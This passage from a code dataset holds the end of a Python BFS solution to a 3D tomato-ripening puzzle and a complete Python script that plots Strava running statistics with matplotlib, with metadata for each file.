range(m):\n if tomato[k][i][j] == '0':\n haveto += 1\n elif tomato[k][i][j] == '1':\n tmt.append((k, i, j))\n res = 0\n while tmt and haveto:\n l = len(tmt)\n for _ in range(l):\n hh, x, y = tmt.popleft()\n if x > 0 and tomato[hh][x-1][y] == '0':\n tomato[hh][x-1][y] = 1\n tmt.append((hh, x-1, y))\n haveto -= 1\n if y > 0 and tomato[hh][x][y-1] == '0':\n tomato[hh][x][y-1] = 1\n tmt.append((hh, x, y-1))\n haveto -= 1\n if x < n-1 and tomato[hh][x+1][y] == '0':\n tomato[hh][x+1][y] = 1\n tmt.append((hh, x+1, y))\n haveto -= 1\n if y < m-1 and tomato[hh][x][y+1] == '0':\n tomato[hh][x][y+1] = 1\n tmt.append((hh, x, y+1))\n haveto -= 1\n if hh > 0 and tomato[hh-1][x][y] == '0':\n tomato[hh-1][x][y] = 1\n tmt.append((hh-1, x, y))\n haveto -= 1\n if hh < h-1 and tomato[hh+1][x][y] == '0':\n tomato[hh+1][x][y] = 1\n tmt.append((hh+1, x, y))\n haveto -= 1\n res += 1\n if haveto:\n print(-1)\n else:\n print(res)\n\n\nif __name__ == '__main__':\n solve()\n", "repo_name": "shg9411/algo", "sub_path": "algo_py/boj/bj7569.py", "file_name": "bj7569.py", "file_ext": "py", "file_size_in_byte": 1692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.stdin", "line_number": 3, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "1774438570", "text": "import sys\nimport os\nimport calendar\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.figure\nimport matplotlib as mpl\n\nfrom typing import Literal, Tuple\nfrom matplotlib.dates import DateFormatter\nfrom matplotlib.ticker import FuncFormatter, MaxNLocator\nfrom utility import load_matplotlib_local_fonts\n\n# ペースの最小値と最大値を設定し、それより速いペースと遅いペースのアクティビティを除外する (min/km)\n# Set the minimum and maximum pace (min/km) and filter out activities that are faster or slower than that\nMIN_PACE = 3\nMAX_PACE = 10\n\n# 距離の最小値を設定し、それより短い距離のアクティビティを除外する (km)\n# Set the minimum distance (km) and filter out activities that are shorter than that\nMIN_DISTANCE = 0.5\n\n# 丸のサイズを設定する\n# Set the size of the markers\nmpl.rcParams[\"lines.markersize\"] = 3.9\n\n# フォントを設定する\n# Set the font\nload_matplotlib_local_fonts(\"fonts/ipaexg.ttf\", 12)\n\n# 他の設定\nmpl.rcParams[\"axes.axisbelow\"] = True\nmpl.rcParams[\"legend.fontsize\"] = \"small\"\nSAVE_FIG_DPI = 
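The BFS in the tomato-ripening record above spells out all six neighbor checks by hand; a common, equivalent refactor is a direction-vector table. A sketch of that expansion step, using the record's (h, n, m) grid dimensions:

# 6-connected neighborhood in (layer, row, col) order, matching the (h, n, m) grid above
DIRS = ((1, 0, 0), (-1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1))

def neighbors(hh, x, y, h, n, m):
    # yield the in-bounds 6-connected neighbors of cell (hh, x, y)
    for dh, dx, dy in DIRS:
        nh, nx, ny = hh + dh, x + dx, y + dy
        if 0 <= nh < h and 0 <= nx < n and 0 <= ny < m:
            yield nh, nx, ny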
300\n\n\ndef preprocess_df(df: pd.DataFrame, activity_type=\"Run\") -> pd.DataFrame:\n \"\"\"Preprocess the DataFrame to prepare for plotting.\"\"\"\n\n # Filter by activity type\n df = df[df[\"type\"] == activity_type].copy()\n\n # Convert date to datetime object\n df[\"date\"] = pd.to_datetime(df[\"date\"])\n\n df.loc[:, \"time_of_day\"] = (\n pd.to_datetime(df[\"time_of_day\"], format=\"%H:%M:%S\").dt.hour * 3600\n + pd.to_datetime(df[\"time_of_day\"], format=\"%H:%M:%S\").dt.minute * 60\n + pd.to_datetime(df[\"time_of_day\"], format=\"%H:%M:%S\").dt.second\n )\n\n # !Filter out average pace that is too fast or too slow\n df = df.query(\"@MIN_PACE <= average_pace_min_km <= @MAX_PACE\")\n\n # !Filter out distance that is too short\n df = df.query(\"@MIN_DISTANCE <= distance_km\")\n\n return df\n\n\ndef fit_data(\n df: pd.DataFrame, y_col: str, deg: int = 5\n) -> Tuple[np.ndarray, np.ndarray, np.poly1d]:\n \"\"\"Fit data with polynomial of degree 'deg'.\"\"\"\n date_as_number = (df[\"date\"] - df[\"date\"].min()).dt.days\n coefficients = np.polyfit(date_as_number, df[y_col], deg)\n polynomial = np.poly1d(coefficients)\n xfit = np.linspace(date_as_number.min(), date_as_number.max(), 1000)\n yfit = polynomial(xfit)\n\n return xfit, yfit, polynomial\n\n\ndef scatter_plots_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Generate scatter plots from the DataFrame.\"\"\"\n fig, axs = plt.subplots(2, 1, figsize=[10, 10])\n\n # Scatter plot distance vs average pace, colored by average heart rate\n scatter0 = axs[0].scatter(\n df[\"distance_km\"],\n df[\"average_pace_min_km\"],\n c=df[\"average_heart_rate_bpm\"],\n cmap=\"Reds\",\n )\n axs[0].set_xlabel(\"距離 (km) [Distance]\")\n axs[0].set_ylabel(\"平均ペース (min/km) [Average Pace]\")\n axs[0].grid(True, linewidth=0.75)\n axs[0].invert_yaxis()\n cbar0 = fig.colorbar(scatter0, ax=axs[0])\n cbar0.set_label(\"平均心拍数 (bpm) [Average Heart Rate]\")\n\n # Scatter plot time of day vs distance, colored by kudos\n default_marker_size = mpl.rcParams[\"lines.markersize\"]\n scatter1 = axs[1].scatter(\n df[\"time_of_day\"],\n df[\"distance_km\"],\n c=df[\"kudos\"],\n s=np.maximum(df[\"kudos\"] * 5, default_marker_size**2),\n cmap=\"rainbow\",\n )\n axs[1].set_xlabel(\"時間帯 (hh:mm) [Time of Day]\")\n axs[1].set_ylabel(\"距離 (km) [Distance]\")\n axs[1].xaxis.set_major_locator(MaxNLocator(nbins=9))\n axs[1].xaxis.set_major_formatter(\n FuncFormatter(\n lambda x, pos: \"{:02}:{:02}\".format(\n int(x // 3600), int((x % 3600) // 60))\n )\n )\n axs[1].set_xlim([0, 24 * 3600])\n axs[1].grid(True, linewidth=0.75)\n cbar1 = fig.colorbar(scatter1, ax=axs[1])\n cbar1.set_label(\"kudos\")\n\n fig.tight_layout()\n\n return fig\n\n\ndef plot_basic_stat_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot basic statistics from a dataframe of activities.\"\"\"\n\n fig, axs = plt.subplots(4, 1, figsize=[15, 30], sharex=True)\n\n # Plot distance (bar chart)\n axs[0].bar(\n df[\"date\"],\n df[\"distance_km\"],\n color=\"#34ACE4\",\n align=\"center\",\n )\n axs[0].set_ylabel(\"距離 (km) [Distance]\")\n axs[0].tick_params(\"x\", labelbottom=False)\n axs[0].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[0].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Annotate the bars with the number of kudos\n for i, v in enumerate(df[\"distance_km\"]):\n axs[0].text(\n df[\"date\"].iloc[i],\n v + 0.1,\n str(df[\"kudos\"].iloc[i]),\n color=\"black\",\n ha=\"center\",\n fontsize=4.5,\n )\n\n # Plot distance (line chart)\n axs[1].plot_date(\n df[\"date\"], 
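preprocess_df above filters with pandas query strings in which @-prefixed names (MIN_PACE, MAX_PACE, MIN_DISTANCE) are resolved from the enclosing Python scope; the mechanism works with any in-scope variable. A self-contained sketch with made-up values:

import pandas as pd

df = pd.DataFrame({"average_pace_min_km": [2.5, 4.0, 6.5, 12.0],
                   "distance_km": [0.2, 5.0, 10.0, 3.0]})
min_pace, max_pace, min_distance = 3, 10, 0.5

# '@name' pulls 'name' from the surrounding Python scope into the query expression
filtered = df.query("@min_pace <= average_pace_min_km <= @max_pace")
filtered = filtered.query("@min_distance <= distance_km")
print(filtered)  # keeps the rows with pace 4.0 and 6.5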
df[\"distance_km\"], \"#FC4C02\", marker=\"o\", markerfacecolor=\"white\"\n )\n axs[1].fill_between(df[\"date\"], df[\"distance_km\"],\n color=\"#FC4C02\", alpha=0.1)\n axs[1].set_ylabel(\"距離 (km) [Distance]\")\n axs[1].tick_params(\"x\", labelbottom=False)\n axs[1].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[1].grid(True, linestyle=\"--\", linewidth=0.75)\n\n # Plot altitude gains (bar chart)\n axs[2].bar(\n df[\"date\"],\n df[\"altitude_gains_m\"],\n color=\"#617A55\",\n align=\"center\",\n )\n axs[2].set_ylabel(\"獲得標高 (m) [Altitude Gains]\")\n axs[2].tick_params(\"x\", labelbottom=False)\n axs[2].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[2].yaxis.set_major_formatter(\n FuncFormatter(lambda x, _: \"{:.0f}\".format(x)))\n axs[2].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Plot duration (scatter chart)\n axs[3].scatter(\n df[\"date\"],\n df[\"duration_min\"],\n color=\"#AB68FF\",\n )\n axs[3].set_ylabel(\"時間 (min) [Duration]\")\n\n # Fit the data\n xfit, yfit, polynomial = fit_data(df, \"duration_min\")\n xfit_dates = df[\"date\"].min() + pd.to_timedelta(xfit, \"D\")\n fitting_label = f\"カーブフィッティング (次数 {len(polynomial)})\\nCurve Fitting (Degree {len(polynomial)})\"\n axs[3].plot(\n xfit_dates,\n yfit,\n color=\"#AB68FF\",\n alpha=0.75,\n linestyle=\"--\",\n linewidth=1.5,\n label=fitting_label,\n )\n axs[3].fill_between(xfit_dates, yfit, color=\"#AB68FF\", alpha=0.1)\n axs[3].grid(True, linestyle=\"--\", linewidth=0.75)\n axs[3].legend()\n\n fig.tight_layout()\n fig.subplots_adjust(bottom=0.035)\n\n return fig\n\n\ndef plot_detailed_stat_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot detailed statistics from a dataframe of activities.\"\"\"\n fig, axs = plt.subplots(4, 1, figsize=[15, 30], sharex=True)\n\n # Plot distance (line chart)\n axs[0].scatter(df[\"date\"], df[\"distance_km\"], color=\"#FC4C02\", marker=\"o\")\n axs[0].set_ylabel(\"距離 (km) [Distance]\")\n axs[0].tick_params(\"x\", labelbottom=False)\n axs[0].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[0].grid(True, linestyle=\"--\", linewidth=0.75)\n # Fit the data\n xfit, yfit, polynomial = fit_data(df, \"distance_km\")\n xfit_dates = df[\"date\"].min() + pd.to_timedelta(xfit, \"D\")\n fitting_label = f\"カーブフィッティング (次数 {len(polynomial)})\\nCurve Fitting (Degree {len(polynomial)})\"\n axs[0].plot(\n xfit_dates,\n yfit,\n color=\"#FC4C02\",\n linestyle=\"--\",\n alpha=0.75,\n linewidth=1.5,\n label=fitting_label,\n )\n axs[0].fill_between(xfit_dates, yfit, color=\"#FC4C02\", alpha=0.1)\n axs[0].grid(True, linestyle=\"--\", linewidth=0.75)\n axs[0].legend()\n\n # Plot calories burned (bar chart)\n axs[1].bar(df[\"date\"], df[\"calories_kcal\"],\n color=\"#EBD944\", align=\"center\")\n axs[1].set_ylabel(\"カロリー (kcal) [Calories]\")\n axs[1].tick_params(\"x\", labelbottom=False)\n axs[1].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Plot average heart rate (scatter plot)\n axs[2].plot_date(df[\"date\"], df[\"average_heart_rate_bpm\"], color=\"#D6324B\")\n axs[2].set_ylabel(\"平均心拍数 (bpm)\\n[Average Heart Rate]\")\n axs[2].tick_params(\"x\", labelbottom=False)\n axs[2].grid(True, linestyle=\"--\", linewidth=0.75)\n\n # Plot average pace (scatter plot)\n axs[3].scatter(df[\"date\"], df[\"average_pace_min_km\"], color=\"#19A7CE\")\n axs[3].set_ylabel(\"平均ペース (min/km)\\n[Average Pace]\")\n axs[3].yaxis.set_major_locator(MaxNLocator(nbins=6))\n axs[3].grid(True, linestyle=\"--\", linewidth=0.75)\n\n # Fit the data\n xfit, yfit, polynomial = fit_data(df, 
\"average_pace_min_km\")\n xfit_dates = df[\"date\"].min() + pd.to_timedelta(xfit, \"D\")\n fitting_label = f\"カーブフィッティング (次数 {len(polynomial)})\\nCurve Fitting (Degree {len(polynomial)})\"\n axs[3].plot(\n xfit_dates,\n yfit,\n color=\"#FC4C02\",\n alpha=0.75,\n linestyle=\"-\",\n linewidth=1.5,\n label=fitting_label,\n )\n axs[3].legend()\n axs[3].invert_yaxis()\n\n # Formatting date\n date_format = DateFormatter(\"%Y-%m\")\n axs[3].xaxis.set_major_formatter(date_format)\n\n fig.tight_layout()\n fig.subplots_adjust(bottom=0.035)\n\n return fig\n\n\ndef scatter_3d_plot_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot a 3D scatter plot from a dataframe of activities.\"\"\"\n fig = plt.figure(figsize=[10, 10])\n ax = fig.add_subplot(111, projection=\"3d\")\n\n # Check if 'temperature_c' column is all NaN\n if df[\"temperature_c\"].isnull().all():\n plt.title(\"get_weather_data.pyを実行してください。\\nPlease run get_weather_data.py.\")\n # If all values are NaN, return the empty plot\n return fig\n\n scatter = ax.scatter(\n df[\"average_pace_min_km\"],\n df[\"duration_min\"],\n df[\"temperature_c\"],\n c=df[\"average_heart_rate_bpm\"],\n s=40,\n cmap=\"Reds\",\n )\n ax.set_xlabel(\"平均ペース (min/km) [Average Pace]\")\n ax.set_ylabel(\"時間 (min) [Duration]\")\n ax.set_zlabel(\"気温 (℃) [Temperature]\")\n cbar = fig.colorbar(scatter, ax=ax)\n cbar.set_label(\"平均心拍数 (bpm) [Average Heart Rate]\")\n fig.tight_layout()\n\n return fig\n\n\ndef categorize_time_of_day(\n time_in_seconds: int,\n) -> Literal[\"朝: 5:00 - 12:00 (Morning)\", \"昼: 12:00 - 18:00 (Afternoon)\", \"夜: 18:00 - 5:00 (Night)\"]:\n \"\"\"Categorize time of day into morning, afternoon, and night.\"\"\"\n if 5 * 3600 <= time_in_seconds < 12 * 3600:\n return \"朝: 5:00 - 12:00 (Morning)\" # Morning: 5:00 - 12:00\n elif 12 * 3600 <= time_in_seconds < 18 * 3600:\n return \"昼: 12:00 - 18:00 (Afternoon)\" # Afternoon: 12:00 - 18:00\n else:\n return \"夜: 18:00 - 5:00 (Night)\" # Night: 18:00 - 5:00\n\n\ndef plot_pie_chart_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot a pie chart from a dataframe of activities.\"\"\"\n df[\"period_of_day\"] = df[\"time_of_day\"].apply(categorize_time_of_day)\n\n # Group by period of day\n group = df.groupby(\"period_of_day\").size()\n\n # Set colors\n color_map = {\n \"朝: 5:00 - 12:00 (Morning)\": \"#E6DF44\",\n \"昼: 12:00 - 18:00 (Afternoon)\": \"#F0810F\",\n \"夜: 18:00 - 5:00 (Night)\": \"#063852\",\n }\n colors = [color_map[i] for i in group.index]\n\n fig, ax = plt.subplots(2, 2, figsize=(15, 10))\n\n # Pie chart\n wedges, labels, autopct_texts = ax[0, 0].pie(\n group,\n labels=group.index.tolist(),\n autopct=lambda p: f\"{p:.1f}% ({int(p * sum(group) / 100)})\",\n startangle=90,\n colors=colors,\n textprops={\"color\": \"black\"},\n wedgeprops={\"edgecolor\": \"white\"},\n )\n\n ax[0, 0].axis(\"equal\")\n ax[0, 0].set_title(\"一日の活動時間割合 [Activity Time of Day]\")\n\n # Change color of text in 'Night' section to white\n for label, pct in zip(labels, autopct_texts):\n if label.get_text() == \"夜: 18:00 - 5:00 (Night)\":\n pct.set_color(\"white\")\n\n # Bar plot for Day of Week\n # Translate weekday names to Japanese\n days_english_to_japanese = {\n \"Monday\": \"月 (Mon)\",\n \"Tuesday\": \"火 (Tue)\",\n \"Wednesday\": \"水 (Wed)\",\n \"Thursday\": \"木 (Thu)\",\n \"Friday\": \"金 (Fri)\",\n \"Saturday\": \"土 (Sat)\",\n \"Sunday\": \"日 (Sun)\",\n }\n days = [\"月 (Mon)\", \"火 (Tue)\", \"水 (Wed)\", \"木 (Thu)\",\n \"金 (Fri)\", \"土 (Sat)\", \"日 (Sun)\"]\n df[\"day_of_week\"] = 
df[\"date\"].dt.weekday.apply(\n lambda x: list(calendar.day_name)[x]\n )\n df[\"day_of_week\"] = df[\"day_of_week\"].map(days_english_to_japanese)\n day_counts = df[\"day_of_week\"].value_counts().reindex(days)\n\n ax[0, 1].bar(day_counts.index, day_counts.values.tolist(), color=\"#18A545\")\n ax[0, 1].set_title(\"日別頻度 [Daily Frequency]\")\n ax[0, 1].set_xlabel(\"曜日 [Day of Week]\")\n ax[0, 1].set_ylabel(\"活動数 [Number of Activities]\")\n ax[0, 1].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Bar plot for Month\n df[\"month\"] = df[\"date\"].dt.month\n month_counts = df[\"month\"].value_counts().reindex(\n range(1, 13), fill_value=0)\n\n ax[1, 1].bar(month_counts.index,\n month_counts.values.tolist(), color=\"#457B9D\")\n ax[1, 1].set_title(\"月別頻度 [Monthly Frequency]\")\n ax[1, 1].set_xlabel(\"月 [Month]\")\n ax[1, 1].set_xticks(range(1, 13))\n ax[1, 1].set_ylabel(\"活動数 [Number of Activities]\")\n ax[1, 1].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n # Bar plot for Year\n df[\"year\"] = df[\"date\"].dt.year\n year_counts = df[\"year\"].value_counts().sort_index()\n\n ax[1, 0].bar(year_counts.index,\n year_counts.values.tolist(), color=\"#FC4C02\")\n ax[1, 0].set_title(\"年別頻度 [Yearly Frequency]\")\n ax[1, 0].set_xlabel(\"年 [Year]\")\n ax[1, 0].set_ylabel(\"活動数 [Number of Activities]\")\n ax[1, 0].set_xticks(year_counts.index)\n ax[1, 0].grid(True, axis=\"y\", linestyle=\"--\", linewidth=0.75)\n\n plt.tight_layout()\n return fig\n\n\ndef plot_histograms_from_df(df: pd.DataFrame) -> matplotlib.figure.Figure:\n \"\"\"Plot histograms of distance and duration from a dataframe of activities.\"\"\"\n\n fig, axs = plt.subplots(3, 1, figsize=[8, 10])\n\n # distance (histogram)\n axs[0].hist(df[\"distance_km\"], bins=\"auto\",\n color=\"#FC4C02\", edgecolor=\"white\")\n axs[0].set_xlabel(\"距離 (km) [Distance]\")\n axs[0].set_ylabel(\"頻度 [Frequency]\")\n axs[0].set_title(\"距離の分布 [Distribution of Distance]\")\n axs[0].yaxis.set_major_locator(MaxNLocator(integer=True))\n axs[0].grid(True, axis=\"y\", linestyle=\"--\")\n\n # duration (histogram)\n axs[1].hist(df[\"duration_min\"], bins=\"auto\",\n color=\"#AB68FF\", edgecolor=\"white\")\n axs[1].set_xlabel(\"時間 (min) [Duration]\")\n axs[1].set_ylabel(\"頻度 [Frequency]\")\n axs[1].set_title(\"時間の分布 [Distribution of Duration]\")\n axs[1].yaxis.set_major_locator(MaxNLocator(integer=True))\n axs[1].grid(True, axis=\"y\", linestyle=\"--\")\n\n # alitude_gains (histogram)\n axs[2].hist(df[\"altitude_gains_m\"], bins=\"auto\",\n color=\"#617A55\", edgecolor=\"white\")\n axs[2].set_xlabel(\"獲得標高 (m) [Altitude Gains]\")\n axs[2].set_ylabel(\"頻度 [Frequency]\")\n axs[2].set_title(\"獲得標高の分布 [Distribution of Altitude Gains]\")\n axs[2].yaxis.set_major_locator(MaxNLocator(integer=True))\n axs[2].grid(True, axis=\"y\", linestyle=\"--\")\n\n fig.tight_layout()\n\n return fig\n\n\ndef plot_weather_data(df: pd.DataFrame) -> matplotlib.figure.Figure:\n fig, axs = plt.subplots(2, 2, figsize=[12, 10])\n\n # Check if 'temperature_c' column is all NaN\n if df[\"temperature_c\"].isnull().all():\n plt.suptitle(\n \"get_weather_data.pyを実行してください。\\nPlease run get_weather_data.py.\")\n # If all values are NaN, return the empty plot\n return fig\n\n scatter0 = axs[0, 0].scatter(\n df[\"average_pace_min_km\"],\n df[\"temperature_c\"],\n c=df[\"humidity_pct\"],\n cmap=\"Blues\",\n )\n axs[0, 0].set_xlabel(\"ペース (min/km) [Pace]\")\n axs[0, 0].set_ylabel(\"気温 (℃) [Temperature]\")\n axs[0, 0].grid(True, linewidth=0.75)\n axs[0, 0].invert_xaxis()\n cbar0 = 
fig.colorbar(scatter0, ax=axs[0, 0])\n cbar0.set_label(\"湿度 (%) [Humidity]\")\n\n scatter1 = axs[0, 1].scatter(\n df[\"distance_km\"],\n df[\"temperature_c\"],\n c=df[\"humidity_pct\"],\n cmap=\"Blues\",\n )\n axs[0, 1].set_xlabel(\"距離 (km) [Distance]\")\n axs[0, 1].set_ylabel(\"気温 (℃) [Temperature]\")\n axs[0, 1].grid(True, linewidth=0.75)\n cbar1 = fig.colorbar(scatter1, ax=axs[0, 1])\n cbar1.set_label(\"湿度 (%) [Humidity]\")\n\n scatter2 = axs[1, 0].scatter(\n df[\"average_pace_min_km\"],\n df[\"humidity_pct\"],\n c=df[\"temperature_c\"],\n cmap=\"Reds\",\n )\n axs[1, 0].set_xlabel(\"ペース (min/km) [Pace]\")\n axs[1, 0].set_ylabel(\"湿度 (%) [Humidity]\")\n axs[1, 0].grid(True, linewidth=0.75)\n axs[1, 0].invert_xaxis()\n cbar2 = fig.colorbar(scatter2, ax=axs[1, 0])\n cbar2.set_label(\"気温 (℃) [Temperature]\")\n\n scatter3 = axs[1, 1].scatter(\n df[\"average_pace_min_km\"],\n df[\"air_pressure_hpa\"],\n c=df[\"temperature_c\"],\n cmap=\"Reds\",\n )\n axs[1, 1].set_xlabel(\"ペース (min/km) [Pace]\")\n axs[1, 1].set_ylabel(\"気圧 (hPa) [Air Pressure]\")\n axs[1, 1].grid(True, linewidth=0.75)\n axs[1, 1].invert_xaxis()\n cbar3 = fig.colorbar(scatter3, ax=axs[1, 1])\n cbar3.set_label(\"気温 (℃) [Temperature]\")\n\n fig.tight_layout()\n\n return fig\n\n\nif __name__ == \"__main__\":\n try:\n df = pd.read_csv(\"strava_data.csv\")\n except FileNotFoundError:\n print(\"strava_data.csvが見つかりません。get_strava_data.pyを実行してください。\")\n print(\"strava_data.csv not found. Please run get_strava_data.py.\")\n sys.exit(1)\n df = preprocess_df(df, activity_type=\"Run\")\n fig1 = plot_basic_stat_from_df(df)\n fig2 = plot_detailed_stat_from_df(df)\n fig3 = scatter_plots_from_df(df)\n fig4 = scatter_3d_plot_from_df(df)\n fig5 = plot_pie_chart_from_df(df)\n fig6 = plot_histograms_from_df(df)\n fig7 = plot_weather_data(df)\n\n plt.show()\n\n # Save figures\n if not os.path.exists(\"images\"):\n os.makedirs(\"images\")\n fig1.savefig(\"images/basic_stat.png\", dpi=SAVE_FIG_DPI)\n fig2.savefig(\"images/detailed_stat.png\", dpi=SAVE_FIG_DPI)\n fig3.savefig(\"images/scatter_plots.png\", dpi=SAVE_FIG_DPI)\n fig4.savefig(\"images/scatter_3d_plot.png\", dpi=SAVE_FIG_DPI)\n fig5.savefig(\"images/pie_chart.png\", dpi=SAVE_FIG_DPI)\n fig6.savefig(\"images/histograms.png\", dpi=SAVE_FIG_DPI)\n fig7.savefig(\"images/weather_data.png\", dpi=SAVE_FIG_DPI)\n\n\n# TODO: Plot data based on different activities (running, climbing, etc.) in different colors and legends\n# TODO: Analyze data with different metrics (e.g. time, location, weather, temperature, etc.)\n# TODO: With machine learning, identify correlation between different metrics and predict future performance (e.g. speed, distance, etc.) with data from the past and new data (e.g. 
food intake, sleep, mood, weather, temperature, etc.)\n", "repo_name": "KORINZ/strava-data-visualization-tool", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 19347, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.rcParams", "line_number": 26, "usage_type": "attribute"}, {"api_name": "utility.load_matplotlib_local_fonts", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 33, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.polyfit", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.poly1d", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 69, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.poly1d", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 94, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FuncFormatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 121, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FuncFormatter", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.to_timedelta", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 121, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 205, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 213, "usage_type": "call"}, {"api_name": "pandas.to_timedelta", "line_number": 217, 
"usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 248, "usage_type": "call"}, {"api_name": "pandas.to_timedelta", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 205, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 277, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 277, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 308, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 318, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "calendar.day_name", "line_number": 368, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 404, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 404, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 318, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 408, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 411, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 411, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 419, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 428, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 437, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 408, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 445, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 446, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 446, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 450, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 450, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 445, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 445, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 513, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 517, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 527, "usage_type": 